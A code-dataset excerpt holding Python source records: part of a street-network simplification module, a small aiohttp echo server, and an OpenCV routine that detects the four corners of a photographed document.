nodes_traversed, drs[0], one_cluster = True)\n else:\n merged = dissolve_multiple_dual_lines(ix_lines, line_geometries, nodes_gdf, edges_gdf, clusters_gdf, None, goal, u[0], last_node,\n nodes_traversed, drs[0], one_cluster = True)\n if merged is None:\n continue \n \n done = True\n between = (list(original_edges_gdf.index[(original_edges_gdf.u.isin(nodes_traversed)) & \n (original_edges_gdf.v.isin(nodes_traversed))]))\n \n if not done: \n continue\n to_drop = to_drop + lines_traversed + ix_lines + between\n to_drop = list(filter(lambda a: a != ix_lines[0], to_drop))\n processed = processed + [ix_lines[0]] + to_drop + lines_traversed + between \n clusters_gdf.at[goal, 'keep'] = True\n if len(original_edges_gdf.loc[processed][original_edges_gdf.pedestrian == 1]) > 0:\n edges_gdf.at[ix_lines[0], 'pedestrian'] = 1\n\n edges_gdf.drop(to_drop, axis = 0, inplace = True, errors = 'ignore')\n nodes_gdf, edges_gdf = reassign_edges(nodes_gdf, edges_gdf, clusters_gdf) \n edges_gdf['edgeID'] = edges_gdf.index.values.astype(int)\n nodes_gdf['nodeID'] = nodes_gdf.index.values.astype(int)\n nodes_gdf.drop(['cluster'], axis = 1, inplace = True)\n return(nodes_gdf, edges_gdf)\n\ndef reassign_edges(nodes_gdf, edges_gdf, clusters_gdf):\n \n print(\"Assigning centroids coordinates\")\n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n edges_gdf = edges_gdf.rename(columns = {'u':'old_u', 'v':'old_v'})\n \n edges_gdf['u'], edges_gdf['v'] = 0, 0\n ix_u, ix_v = edges_gdf.columns.get_loc(\"u\")+1, edges_gdf.columns.get_loc(\"v\")+1 \n ix_old_u, ix_old_v = edges_gdf.columns.get_loc(\"old_u\")+1, edges_gdf.columns.get_loc(\"old_v\")+1 \n ix_geo = edges_gdf.columns.get_loc(\"geometry\")+1 \n ix_changed = edges_gdf.columns.get_loc(\"new_geo\")+1 \n ix_cluster = nodes_gdf.columns.get_loc(\"cluster\")+1 \n ix_x, ix_y = clusters_gdf.columns.get_loc(\"x\")+1, clusters_gdf.columns.get_loc(\"y\")+1\n ix_centroid = clusters_gdf.columns.get_loc(\"geometry\")+1\n ix_check = clusters_gdf.columns.get_loc(\"keep\")+1\n \n for row in edges_gdf.itertuples():\n \n line_coords = list(row[ix_geo].coords)\n u = nodes_gdf.loc[row[ix_old_u]][\"cluster\"]\n v = nodes_gdf.loc[row[ix_old_v]][\"cluster\"]\n old_u = row[ix_old_u]\n old_v = row[ix_old_v]\n new_geo = row[ix_changed]\n \n if (u is not None) & (v is not None): # change starting and ending node in the list of coordinates for the line\n if (not clusters_gdf.loc[u].keep) & (not clusters_gdf.loc[v].keep): \n u = old_u\n v = old_v\n elif not clusters_gdf.loc[v].keep:\n v = old_v\n line_coords[0] = (clusters_gdf.loc[u]['x'], clusters_gdf.loc[u]['y'])\n # if not new_geo: line_coords.insert(1,nodes_gdf.loc[row[ix_old_u]]['geometry'].coords[0]) \n elif not clusters_gdf.loc[u].keep:\n u = old_u \n line_coords[-1] = (clusters_gdf.loc[v]['x'], clusters_gdf.loc[v]['y'])\n # if not new_geo: line_coords.insert(-1,nodes_gdf.loc[row[ix_old_v]]['geometry'].coords[0]) \n else:\n line_coords[0] = (clusters_gdf.loc[u]['x'], clusters_gdf.loc[u]['y'])\n line_coords[-1] = (clusters_gdf.loc[v]['x'], clusters_gdf.loc[v]['y'])\n # if not new_geo:\n # line_coords.insert(1,nodes_gdf.loc[row[ix_old_u]]['geometry'].coords[0]) \n # line_coords.insert(-1,nodes_gdf.loc[row[ix_old_v]]['geometry'].coords[0]) \n\n elif (u is None) & (v is None): # maintain old_u and old_v\n u = old_u\n v = old_v\n elif (u is None) & (v is not None): # maintain old_u\n u = old_u\n if not clusters_gdf.loc[v].keep: \n v = old_v\n else: \n line_coords[-1] = (clusters_gdf.loc[v]['x'], clusters_gdf.loc[v]['y'])\n # if not new_geo: line_coords.insert(-1,nodes_gdf.loc[row[ix_old_v]]['geometry'].coords[0]) \n elif (u is not None) & (v is None): # maintain old_v\n v = old_v\n if not clusters_gdf.loc[u].keep: \n u = old_u\n else: \n line_coords[0] = (clusters_gdf.loc[u]['x'], clusters_gdf.loc[u]['y'])\n # if not new_geo: line_coords.insert(1,nodes_gdf.loc[row[ix_old_u]]['geometry'].coords[0]) \n \n line_geometry = (LineString([coor for coor in line_coords]))\n if u == v: \n edges_gdf.drop(row.Index, axis = 0, inplace = True)\n continue\n \n edges_gdf.at[row.Index,\"u\"] = u\n edges_gdf.at[row.Index,\"v\"] = v\n edges_gdf.at[row.Index,\"geometry\"] = line_geometry\n\n edges_gdf.drop(['old_u', 'old_v'], axis = 1, inplace=True)\n edges_gdf['u'] = edges_gdf['u'].astype(int)\n edges_gdf['v'] = edges_gdf['v'].astype(int)\n nodes_gdf['x'] = nodes_gdf['x'].astype(float)\n nodes_gdf['y'] = nodes_gdf['y'].astype(float)\n \n for cluster in clusters_gdf.itertuples():\n if not cluster[ix_check]:\n continue\n \n nodes_gdf.at[cluster.Index, 'x'] = cluster[ix_x]\n nodes_gdf.at[cluster.Index, 'y'] = cluster[ix_y]\n nodes_gdf.at[cluster.Index, 'geometry'] = cluster[ix_centroid]\n nodes_gdf.at[cluster.Index, 'nodeID'] = cluster.Index\n nodes_gdf.at[cluster.Index, 'cluster'] = None\n \n clusters_gdf.index = clusters_gdf.clusterID.astype(int)\n nodes_gdf['nodeID'] = nodes_gdf.nodeID.astype(int)\n nodes_gdf.index = nodes_gdf.nodeID\n nodes_gdf.index.name = None\n edges_gdf.drop(['clus_u','clus_v', 'clus_uR', 'clus_vR', 'new_geo', 'forced_cluster'], axis = 1, errors = 'ignore', inplace = True)\n edges_gdf = correct_edges(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = clean_network(nodes_gdf, edges_gdf, dead_ends = True, remove_disconnected_islands = False, same_uv_edges = True, self_loops = True)\n return(nodes_gdf, edges_gdf)\n \ndef simplify_pipeline(nodes_gdf, edges_gdf, radius = 12):\n \n nodes_gdf, edges_gdf = nodes_gdf.copy(), edges_gdf.copy()\n nodes_gdf, edges_gdf = clean_network(nodes_gdf, edges_gdf, remove_disconnected_islands = True, same_uv_edges = True, dead_ends = True,\n self_loops = True)\n nodes_gdf, edges_gdf = simplify_dual_lines_junctions(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = simplify_complex_junctions(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = dissolve_roundabouts(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf, clusters_gdf = identify_clusters(nodes_gdf, edges_gdf, radius = radius)\n nodes_gdf, edges_gdf, clusters_gdf = simplify_dual_lines(nodes_gdf, edges_gdf, clusters_gdf)\n nodes_gdf, edges_gdf = simplify_dual_lines_nodes_to_cluster(nodes_gdf, edges_gdf, clusters_gdf)\n nodes_gdf, edges_gdf = simplify_dual_lines_junctions(nodes_gdf, edges_gdf)\n nodes_gdf, edges_gdf = simplify_complex_junctions(nodes_gdf, edges_gdf)\n \n return nodes_gdf, edges_gdf\n \n \n\n \n \n \n \n \n \n \n \n","sub_path":"cityImage/simplification.py","file_name":"simplification.py","file_ext":"py","file_size_in_byte":78818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"566074245","text":"import asyncio\nimport random\n\nfrom aiohttp import web\n\n\nasync def echo_name(request):\n await asyncio.sleep(random.randint(0, 5))\n name = request.match_info.get(\"name\", \"Anonymous\")\n return web.json_response({\"hi\": name})\n\n\nasync def index(request):\n await asyncio.sleep(random.randint(0, 5))\n return web.json_response({\"index\": \"page\"})\n\n\napp = web.Application()\napp.add_routes([\n web.get(\"/\", index),\n web.get(\"/{name}\", echo_name)\n])\n\nif __name__ == \"__main__\":\n web.run_app(app, host=\"0.0.0.0\")\n","sub_path":"python/asyncio_study/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"648950195","text":"import cv2\r\nimport imutils\r\nimport numpy as np\r\nfrom utils.lib import functlib\r\n\r\nfrom math import pi\r\nfrom math import fabs\r\nfrom math import atan2\r\nfrom math import ceil\r\n\r\n###################################################################################################\r\ndef reduce_noise_forBinaryImage(imageBinary,rm_w=100,isWidth = True):\r\n\r\n num_labels,labels,stats,centroids = cv2.connectedComponentsWithStats(imageBinary, 4, cv2.CV_32S)\r\n \r\n mask = np.ones_like(labels)\r\n\r\n labels_in_mask = list(np.arange(1,num_labels))\r\n\r\n if isWidth:\r\n k = 2\r\n else:\r\n k = 3\r\n\r\n widths = [s[k] for s in stats] #get width\r\n\r\n sorted_idx = np.argsort(widths)\r\n\r\n widths_final = [widths[s] for s in sorted_idx][:-1]\r\n \r\n for lidx, cc in zip(sorted_idx, widths_final):\r\n if cc <= rm_w:\r\n mask[labels == lidx] = 0\r\n labels_in_mask.remove(lidx)\r\n\r\n #decomment this line if wrong accuracy\r\n imageBinary[mask==0]=0\r\n\r\n #processed_area = 255 - processed_area\r\n return imageBinary\r\n# end function\r\n\r\ndef FindFourPointUsingHoughLines(edged):\r\n ## four points from borders of image\r\n LeftTop = [0, 0];\r\n RightTop = [edged.shape[1], 0];\r\n RightBot = [edged.shape[1], edged.shape[0]];\r\n LeftBot = [0,edged.shape[0]];\r\n FourBorder=[LeftTop,RightTop,RightBot,LeftBot]; ##1.tl 2.tr 3.br 4.bl\r\n #print(\"k1 point\",FourBorder)\r\n\r\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(3,3))\r\n\r\n dilated = cv2.morphologyEx(edged, cv2.MORPH_DILATE, kernel)\r\n\r\n ##find hough lines from edge image\r\n #nlinesP = cv2.HoughLinesP(dilated, 1, np.pi/180, 80, minLineLength=20, maxLineGap=1)\r\n\r\n nlinesP=cv2.HoughLinesP(dilated, 1, np.pi / 180, 80,100, 20,) ## runs the actual detection\r\n\r\n cdst = cv2.cvtColor(edged,cv2.COLOR_GRAY2BGR)\r\n #print(nlinesP)\r\n for l in nlinesP:\r\n cv2.line(cdst,(l[0][0],l[0][1]),(l[0][2],l[0][3]),(0,0,255),2)\r\n cv2.imshow('cdst',cdst)\r\n cv2.waitKey(0)\r\n\r\n\r\n\r\n if (nlinesP is None or len(nlinesP) == 1): ## no lines or one line\r\n print(\"no line\")\r\n ## can not find documents, get border of image\r\n border = 10;\r\n extLeftTop = extRightTop = extLeftBot = extRightBot =[None]*2\r\n\r\n extLeftTop[0] = LeftTop[0] + border; extLeftTop[1] = LeftTop[1] + border\r\n extRightTop[0] = RightTop[0] - border;extRightTop[1] = RightTop[1] + border\r\n extLeftBot[0] = LeftBot[0] + border;extLeftBot[1] = LeftBot[1] - border\r\n extRightBot[0] = RightBot[0] - border;extRightBot[1] = RightBot[1] - border\r\n return False,extLeftTop,extRightTop,extRightBot,extLeftBot\r\n else:\r\n #### have at least 2 lines\r\n ## find intesection points between lines\r\n ##check case many lines\r\n\r\n IntersectPoints = []\r\n if (len(nlinesP) > 30):\r\n \r\n print('small hough line group') \r\n\r\n SmallnlinesP=functlib.getsmallsetLines(edged, nlinesP) ## remove unwanted lines\r\n\r\n # print small set line\r\n temp_img = cv2.cvtColor(edged,cv2.COLOR_GRAY2BGR)\r\n\r\n for l in SmallnlinesP:\r\n cv2.line(temp_img,(l[0][0],l[0][1]),(l[0][2],l[0][3]),(0,0,255),2)\r\n cv2.imshow('nncdst',temp_img)\r\n cv2.waitKey(0)\r\n\r\n if (len(SmallnlinesP)==0):\r\n \r\n # print('no small line')\r\n # ## can not find documents, get border of image\r\n # border = 10;\r\n # extLeftTop = extRightTop = extLeftBot = extRightBot =[None]*2\r\n\r\n # extLeftTop[0] = LeftTop[0] + border; extLeftTop[1] = LeftTop[1] + border\r\n # extRightTop[0] = RightTop[0] - border;extRightTop[1] = RightTop[1] + border\r\n # extLeftBot[0] = LeftBot[0] + border;extLeftBot[1] = LeftBot[1] - border\r\n # extRightBot[0] = RightBot[0] - border;extRightBot[1] = RightBot[1] - border\r\n # return False,extLeftTop,extRightTop,extRightBot,extLeftBot\r\n IntersectPoints = functlib.FindPointIntersection(edged, nlinesP)\r\n \r\n else:\r\n IntersectPoints = functlib.FindPointIntersection(edged, SmallnlinesP)\r\n else:\r\n IntersectPoints = functlib.FindPointIntersection(edged, nlinesP)\r\n\r\n \r\n\r\n IntersectPoints = functlib.posprocess_IntersectionPoint(edged,IntersectPoints)\r\n \r\n for p in IntersectPoints:\r\n cv2.circle(edged, tuple(p), 5, (255, 50, 255), -1)\r\n\r\n cv2.imshow('point',edged)\r\n cv2.waitKey(0)\r\n\r\n if len(IntersectPoints)<4:#less than 4 Point\r\n print(\"less than 4 Point\")\r\n ## first set points to border points of image\r\n\r\n border = 10;\r\n extLeftTop = [border,border]\r\n extRightTop = [edged.shape[1]-border, border]\r\n extRightBot = [edged.shape[1]-border, edged.shape[0]-border];\r\n extLeftBot = [border,edged.shape[0]-border]\r\n ##update new corner points \r\n t1=[];\r\n indexP=0; ##0-tl 1-tr 3-br 3-bl\r\n id_closet=0;\r\n mindist = 0;\r\n maxdist_0 = maxdist_1 = maxdist_2 = maxdist_3 = 99999999\r\n\r\n for i in range(len(IntersectPoints)):\r\n \r\n ##update corner points of documents\r\n t1,indexP,mindist= functlib.Distance_ReferencePoint(IntersectPoints[i], FourBorder);\r\n\r\n if (indexP == 0): ##top left point\r\n\r\n if (mindist <= maxdist_0):\r\n \r\n maxdist_0 = mindist;\r\n extLeftTop = IntersectPoints[i];\r\n \r\n elif (indexP == 1): ## top right point\r\n \r\n if (mindist <= maxdist_1):\r\n \r\n maxdist_1 = mindist;\r\n extRightTop = IntersectPoints[i]; \r\n \r\n elif (indexP == 2): ## bottom right\r\n \r\n if (mindist <= maxdist_2):\r\n \r\n maxdist_2 = mindist;\r\n extRightBot = IntersectPoints[i];\r\n \r\n else: ## bottom left\r\n if (mindist <= maxdist_3):\r\n \r\n maxdist_3 = mindist;\r\n extLeftBot = IntersectPoints[i];\r\n \r\n return False,extLeftTop,extRightTop,extRightBot,extLeftBot\r\n else:\r\n print(\"greater than 4 Point\")\r\n ## >= 4 points , find possible quadrilateral and get largest area\r\n\r\n print(IntersectPoints)\r\n Qual = functlib.FindQual(edged, IntersectPoints)\r\n if (Qual):\r\n max_area = id_x = 0\r\n for i,x in enumerate(Qual):\r\n if(max_area= img.shape[1]*0.4 and w >= img.shape[1]*0.4:\r\n # print(\"YES\")\r\n \r\n # cv2.rectangle(roi_copy, (x, y), (x+w, y+h), (0, 255, 0), 3);\r\n # print(approx)\r\n # cv2.imshow(\"contour\", roi_copy);\r\n # cv2.waitKey(0);\r\n\r\n approx = sorted(approx, key = cv2.contourArea, reverse = True)[:5]\r\n roi_copy = img.copy()\r\n\r\n cv2.drawContours(roi_copy, [approx[0]], -1, 255, -1)\r\n #draw contour\r\n cv2.imshow(\"contour\", roi_copy);\r\n cv2.waitKey(0);\r\n\r\n # sai cho nay\r\n hull = []\r\n Group_FourCornerDoc = []\r\n hull_4vertice = 0\r\n appr_size = len(approx)\r\n\r\n #convex hull\r\n for i in range(0,appr_size):\r\n Area_approx = cv2.contourArea(approx[i])\r\n Area_image = img.shape[1] * img.shape[0]\r\n\r\n if (Area_approx > Area_image*0.1):\r\n CHtemp = cv2.convexHull(approx[i])\r\n Area_hull = np.abs(cv2.contourArea(CHtemp))\r\n if len(CHtemp)<=8 and len(CHtemp)>=4\\\r\n and Area_hull > Area_image * 0.15 \\\r\n and Area_hull / Area_image < 0.9:\r\n #if convex hull has exactly 4 edges ... check angles and length\r\n if len(CHtemp) == 4:\r\n print(\"CHTemp\")\r\n #sort by order 0.top left 1. top rigth 2. bottom right 3. bottom left\r\n hull_4edges = functlib.orderPoints(CHtemp.tolist())\r\n\r\n hull_4edges_angles = functlib.FindAngleFromRect(hull_4edges)\r\n hull_4edges_length = functlib.FindLengthFromRect(hull_4edges)\r\n \r\n h_angle_min = 70;\r\n h_angle_max = 110;\r\n h_minedge = min(hull_4edges_length[0], hull_4edges_length[1],hull_4edges_length[2], hull_4edges_length[3])\r\n h_maxedge = max(hull_4edges_length[0],hull_4edges_length[1], hull_4edges_length[2], hull_4edges_length[3])\r\n if (h_minedge / h_maxedge > 0.45 and h_minedge / h_maxedge < 0.8 #0.45 0.8\r\n and hull_4edges_angles[0] > h_angle_min and hull_4edges_angles[0] < h_angle_max \r\n and hull_4edges_angles[1] > h_angle_min and hull_4edges_angles[1] < h_angle_max \r\n and hull_4edges_angles[2] > h_angle_min and hull_4edges_angles[2] < h_angle_max \r\n and hull_4edges_angles[3] > h_angle_min and hull_4edges_angles[3] < h_angle_max):\r\n \r\n # set flag is 1\r\n hull_4vertice = 1;\r\n hull.append(hull_4edges) #dont find rotated rectangle for that hull\r\n continue\r\n \r\n #### find rotated rectangle of convex hull (number of edgeds > 4)\r\n TempRect = cv2.minAreaRect(approx[i]);\r\n rectsize = len(TempRect)\r\n rect_points = cv2.boxPoints(TempRect); # get 4 points from rotated rect\r\n \r\n xrank = np.argsort(rect_points[:, 0])\r\n\r\n left = rect_points[xrank[:2], :]\r\n yrank = np.argsort(left[:, 1])\r\n left = left[yrank, :]\r\n\r\n right = rect_points[xrank[2:], :]\r\n yrank = np.argsort(right[:, 1])\r\n right = right[yrank, :]\r\n\r\n # top-left, top-right, bottom-right, bottom-left\r\n box_coords = tuple(left[0]), tuple(right[0]), tuple(right[1]), tuple(left[1])\r\n box_height = functlib._distance(left[0],left[1])\r\n box_width = functlib._distance(left[0],right[0])\r\n\r\n ratio_m = min(box_height, box_width) / max(box_height, box_width)\r\n \r\n if (ratio_m > 0.45 and ratio_m < 0.8\r\n and left[0][0] > 0 and left[0][1] < img.shape[0] \r\n and right[0][0]>0 and right[0][1] > 0 \r\n and right[1][0] < img.shape[1] and right[1][1]>0 \r\n and left[1][0] < img.shape[1] and left[1][1] < img.shape[0]):\r\n\r\n RRectPoint=[rect_points[0],rect_points[1],rect_points[2],rect_points[3]]\r\n orderRRect = functlib.orderPoints(RRectPoint)\r\n Group_FourCornerDoc.append(orderRRect)\r\n ###delete if coordinate value of points is negative and ratio between heigh and width\r\n #sort hull with 4 edges on their areas, the first is the largest one\r\n \r\n hull = np.array(hull).astype(np.int32)\r\n hull = sorted(hull, key = lambda x: np.abs(cv2.contourArea(x)),reverse=False)\r\n #sort rotated rectangle based on their area, the first is the largest one\r\n Group_FourCornerDoc = np.array(Group_FourCornerDoc).astype(np.int32)\r\n\r\n Group_FourCornerDoc = sorted(Group_FourCornerDoc,key = lambda x: np.abs(cv2.contourArea(x)),reverse=True)\r\n\r\n\r\n\r\n convexHull_mask = np.zeros_like(img)\r\n\r\n for i in range(0,len(hull)):\r\n cv2.drawContours(convexHull_mask,hull,i, (255,255,255), 3)\r\n print(\"area of convex hull :\" ,np.abs(cv2.contourArea(hull[i])))\r\n\r\n cv2.imshow(\"convexHull_mask\", convexHull_mask);\r\n cv2.waitKey(0);\r\n\r\n\r\n convexHull_mask2 = np.zeros_like(img)\r\n\r\n for i in range(0,len(Group_FourCornerDoc)):\r\n cv2.drawContours(convexHull_mask2,Group_FourCornerDoc,i, (255,255,255), 3)\r\n\r\n cv2.imshow(\"rotated retangle\", convexHull_mask2);\r\n cv2.waitKey(0);\r\n\r\n extLeftTop, extRightTop, extLeftBot, extRightBot = None,None,None,None\r\n\r\n if (len(Group_FourCornerDoc)==0 and len(hull)==0):\r\n print(\"case 1: no enclosed contour\")\r\n #apply the Algorithm 1\r\n #(Algorithm 1) Find possible four corners of document based on hough lines using imgage edges.\r\n _,extLeftTop, extRightTop, extLeftBot, extRightBot = FindFourPointUsingHoughLines(edged)\r\n #convex hull with four edged\r\n elif hull_4vertice == 1:\r\n print(\"case 2: hull 4 edged\")\r\n # compare ratio with convex hull using houglines method (algorithm 1)\r\n check_HL, extLeftTopHL, extRightTopHL, extRightBotHL, extLeftBotHL=FindFourPointUsingHoughLines(edged)\r\n FourextPointfromHL=np.array([extLeftTopHL, extRightTopHL, extRightBotHL, extLeftBotHL]).astype(np.int32) #1.tl 2.tr 3.br 4.bl\r\n # get the smallest one from hull 4 edged\r\n extLeftTop,extRightTop,extRightBot,extLeftBot = hull[-1][0],hull[-1][1],hull[-1][2],hull[-1][3]\r\n # update four corners if possible\r\n #extLeftTop,extRightTop,extRightBot,extLeftBot = extLeftTopHL,extRightTopHL,extRightBotHL,extLeftBotHL\r\n if check_HL == True:\r\n FourextPointfromHULL = np.array([extLeftTop,extRightTop,extRightBot,extLeftBot]).astype(np.int32)\r\n # compare ratio between two areas\r\n ratio2Area = np.abs(cv2.contourArea(FourextPointfromHULL)) / np.abs(cv2.contourArea(FourextPointfromHL))\r\n ratio2Area2 = np.abs(cv2.contourArea(FourextPointfromHL)) / (edged.shape[0]*edged.shape[1])\r\n print(\"S_1 / S_image\" \r\n ,ratio2Area2)\r\n print(\"S_2 / S_1\",ratio2Area)\r\n \r\n # ratio là S_2/S_1 ( thường là S_1>S_2)\r\n # nếu dùng hull mà được diện tích lớn hơn thì phải nhận diện tích đó\r\n if ratio2Area < 1 and ratio2Area2 > 0.5:\r\n #get four corners from hough line method (algorithm 1)\r\n extLeftTop,extRightTop,extRightBot,extLeftBot = extLeftTopHL,extRightTopHL,extRightBotHL,extLeftBotHL\r\n\r\n elif len(Group_FourCornerDoc) == 1:\r\n print(\"case 3: only one rect\")\r\n #compare ratio with convex hull using houglines method (algoritm 1)\r\n #Point extLeftTopHL, extRightTopHL, extLeftBotHL, extRightBotHL;\r\n check_HL, extLeftTopHL, extRightTopHL, extRightBotHL, extLeftBotHL=FindFourPointUsingHoughLines(edged)\r\n #1.tl 2.tr 3.br 4.bl\r\n FourextPointfromHL=np.array([extLeftTopHL, extRightTopHL, extRightBotHL, extLeftBotHL]).astype(np.int32) \r\n\r\n #get the largest one from set of rotated rectangles\r\n extLeftTop,extRightTop,extRightBot,extLeftBot = Group_FourCornerDoc[0][0],Group_FourCornerDoc[0][1],Group_FourCornerDoc[0][2],Group_FourCornerDoc[0][3]\r\n if check_HL == True:\r\n FourextPointfromHULL = np.array([extLeftTop,extRightTop,extRightBot,extLeftBot]).astype(np.int32)\r\n # compare ratio between two areas\r\n ratio2Area = np.abs(cv2.contourArea(FourextPointfromHULL)) / np.abs(cv2.contourArea(FourextPointfromHL))\r\n ratio2Area2 = np.abs(cv2.contourArea(FourextPointfromHL)) / (edged.shape[0]*edged.shape[1])\r\n print(\"S_1 / S_image\" \r\n ,ratio2Area2)\r\n print(\"S_2 / S_1\",ratio2Area)\r\n \r\n # ratio là S_2/S_1 ( thường là S_1>S_2)\r\n # nếu dùng hull mà được diện tích lớn hơn thì phải nhận diện tích đó\r\n if ratio2Area < 1 and ratio2Area2 > 0.5:\r\n #get four corners from hough line method (algorithm 1)\r\n extLeftTop,extRightTop,extRightBot,extLeftBot = extLeftTopHL,extRightTopHL,extRightBotHL,extLeftBotHL\r\n\r\n\r\n else:\r\n print(\"case 4: multi rects\")\r\n \r\n if(len(Group_FourCornerDoc)== 2):\r\n\r\n extLeftTop, extRightTop, extRightBot, extLeftBot = Group_FourCornerDoc[1][0],Group_FourCornerDoc[1][1],Group_FourCornerDoc[1][2],Group_FourCornerDoc[1][3]\r\n #check inside the contour\r\n \r\n btl = cv2.pointPolygonTest(Group_FourCornerDoc[0], (extLeftTop[0],extLeftTop[1]), False);\r\n brt = cv2.pointPolygonTest(Group_FourCornerDoc[0], (extRightTop[0],extRightTop[1]), False);\r\n brb = cv2.pointPolygonTest(Group_FourCornerDoc[0], (extRightBot[0],extRightBot[1]), False);\r\n blb = cv2.pointPolygonTest(Group_FourCornerDoc[0], (extLeftBot[0],extLeftBot[1]), False);\r\n\r\n if (btl > -1 and brt > -1 and brb > -1 and blb > -1):# // inside\r\n #get corners from the largest one;\r\n extLeftTop = Group_FourCornerDoc[0][0];\r\n extRightTop = Group_FourCornerDoc[0][1];\r\n extRightBot = Group_FourCornerDoc[0][2];\r\n extLeftBot = Group_FourCornerDoc[0][3];\r\n\r\n\r\n else:\r\n # multiple RECTs : find intersection points and largest quadrilateral \r\n LeftTop,RightTop,LeftBot,RightBot = [0,0],[edged.shape[1], 0],[0,edged.shape[0]],[edged.shape[1],edged.shape[0]]\r\n for i in range(len(Group_FourCornerDoc)):\r\n \r\n ##get 4 lines for each RECT\r\n extl = Group_FourCornerDoc[i][0];\r\n exrt = Group_FourCornerDoc[i][1];\r\n exrb = Group_FourCornerDoc[i][2];\r\n exlb = Group_FourCornerDoc[i][3];\r\n l1=[None]*4\r\n l2=[None]*4\r\n l3=[None]*4\r\n l4=[None]*4\r\n l1[0] = extl[0]; l1[1] = extl[1]; l1[2] = exrt[0]; l1[3] = exrt[1];\r\n l2[0] = exrt[0]; l2[1] = exrt[1]; l2[2] = exrb[0]; l2[3] = exrb[1];\r\n l3[0] = exrb[0]; l3[1] = exrb[1]; l3[2] = exlb[0]; l3[3] = exlb[1];\r\n l4[0] = exlb[0]; l4[1] = exlb[1]; l4[2] = extl[0]; l4[3] = extl[1];\r\n nlinesP.append(l1);\r\n nlinesP.append(l2);\r\n nlinesP.append(l3);\r\n nlinesP.append(l4);\r\n \r\n if (not nlinesP): ## no line\r\n \r\n border = 10;\r\n extLeftTop[0] = LeftTop[0] + border; extLeftTop[1] = LeftTop[1] + border;\r\n extRightTop[0] = RightTop[0] - border;extRightTop[1] = RightTop[1] + border;\r\n extLeftBot[0] = LeftBot[0] + border;extLeftBot[1] = LeftBot[1] - border;\r\n extRightBot[0] = RightBot[0] - border;extRightBot[1] = RightBot[1] - border;\r\n \r\n else:\r\n \r\n ## find intesection points\r\n \r\n IntersectPoints=FindPointIntersection(edged, nlinesP);\r\n Qual=FindQual(edged, IntersectPoints);\r\n if (Qual):\r\n \r\n ##cout << 'number of quadrilaterals' << Qual.size() << endl;\r\n sort(Qual[0], Qual[0], compareContourAreas);\r\n SelectQual = Qual[0];\r\n extLeftTop = SelectQual[0];\r\n extRightTop = SelectQual[1];\r\n extRightBot = SelectQual[2];\r\n extLeftBot = SelectQual[3];\r\n \r\n else:\r\n \r\n \r\n extLeftTop[0] = LeftTop[0] + border; extLeftTop[1] = LeftTop[1] + border;\r\n extRightTop[0] = RightTop[0] - border;extRightTop[1] = RightTop[1] + border;\r\n extLeftBot[0] = LeftBot[0] + border;extLeftBot[1] = LeftBot[1] - border;\r\n extRightBot[0] = RightBot[0] - border;extRightBot[1] = RightBot[1] - border;\r\n\r\n\r\n \r\n # if functlib._distance(extLeftTop,extRightTop) < functlib._distance(extLeftTop,extLeftBot):\r\n # temp = extLeftTop\r\n # extLeftTop = extRightTop\r\n # extRightTop = extRightBot\r\n # extRightBot = extLeftBot\r\n # extLeftBot = temp\r\n\r\n # print('w1',max(functlib._distance(extLeftTop,extRightTop),functlib._distance(extRightBot,extLeftBot)))\r\n # print('h1',min(functlib._distance(extLeftTop,extLeftBot),functlib._distance(extRightBot,extRightTop)))\r\n\r\n [extLeftTop,extRightTop,extRightBot,extLeftBot] = functlib.posprocess_Qual(edged,[extLeftTop,extRightTop,extRightBot,extLeftBot],border=10,scale = True)\r\n\r\n\r\n #print(\"four point\",[extLeftTop,extLeftBot,extRightBot,extRightTop])\r\n #cv2.imshow('Four_Points', img_4point);\r\n #cv2.waitKey(0);\r\n\r\n ###### INTERACTION ##################\r\n #interactive\r\n # if interactive :\r\n # l = np.array([extLeftTop,extLeftBot,extRightBot,extRightTop])\r\n # l = l.reshape(4, 2)\r\n # l = functlib.orderPoints(l)\r\n # [extLeftTop,extLeftBot,extRightBot,extRightTop] = interactive_get_contour(l, img_interactive)\r\n #cv2.imshow('aaa',rescaled_image)\r\n #cv2.waitKey(0)\r\n \r\n #[extLeftTop,extLeftBot,extRightBot,extRightTop] = l\r\n\r\n #############################\r\n\r\n\r\n h,w,c = img.shape\r\n h2,w2,c2 = img_original.shape\r\n\r\n \r\n extLeftTop[0] = ceil(extLeftTop[0] * w2/w)\r\n extLeftBot[0] = ceil(extLeftBot[0] * w2/w)\r\n extRightBot[0] = ceil(extRightBot[0] * w2/w)\r\n extRightTop[0] = ceil(extRightTop[0] * w2/w)\r\n\r\n\r\n extLeftTop[1] = ceil(extLeftTop[1] * w2/w)\r\n extLeftBot[1] = ceil(extLeftBot[1] * w2/w)\r\n extRightBot[1] = ceil(extRightBot[1] * w2/w)\r\n extRightTop[1] = ceil(extRightTop[1] * w2/w)\r\n #############################\r\n \r\n img_tf = functlib.four_point_transform(img_original,[extLeftTop,extLeftBot,extRightBot,extRightTop])\r\n\r\n # check condition and zoom 4 point again\r\n if check_condition_to_scale(img_tf):\r\n print(\"ZOOM 4 POINT AGAIN \")\r\n extLeftTop,extLeftBot,extRightBot,extRightTop = functlib.zoom_Points([extLeftTop,extLeftBot,extRightBot,extRightTop],0.08)\r\n img_tf = functlib.four_point_transform(img_original,[extLeftTop,extLeftBot,extRightBot,extRightTop])\r\n\r\n return img_tf\r\n\r\ndef check_condition_to_scale(img_FFP):\r\n '''find picture of man and check some condition to scale'''\r\n\r\n # resize and convert to Gray\r\n img = functlib.resizeToHeight(img_FFP.copy(),500)\r\n\r\n img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n height,width = img.shape\r\n #print(height,width)\r\n #img = cv2.medianBlur(img,5)\r\n img = cv2.GaussianBlur(img, (9, 9), 0)\r\n #img = cv2.bilateralFilter(img,9,75,75)\r\n ret,thresh = cv2.threshold(img,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\r\n # cv2.imshow('thresh',thresh)\r\n # cv2.waitKey(0)\r\n\r\n # morphologi_Dilate\r\n kernel = 